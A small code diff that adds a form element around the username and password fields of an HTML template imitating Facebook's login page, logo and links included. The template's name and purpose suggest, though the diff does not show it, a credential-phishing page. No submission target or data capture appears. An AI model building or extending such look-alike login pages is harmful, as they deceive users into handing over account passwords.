--- a/templates/facebook.html
+++ b/templates/facebook.html
@@ -98,9 +98,11 @@ body {
   <div class="wrapper">
     <h1 class="logo">facebook</h1>
     <div class="login-box">
+    <form>
       <input type="text" id="username" name="username" placeholder="Mobile number or email" required />
       <input type="password" id="password" name="password" placeholder="Password" required />
       <input type="submit" class="login-btn" value="Log In">
+    </form>
       <a href="#" class="forgot">Forgotten password?</a>
       <div class="divider"></div>
       <button class="create-btn">Create New Account</button>
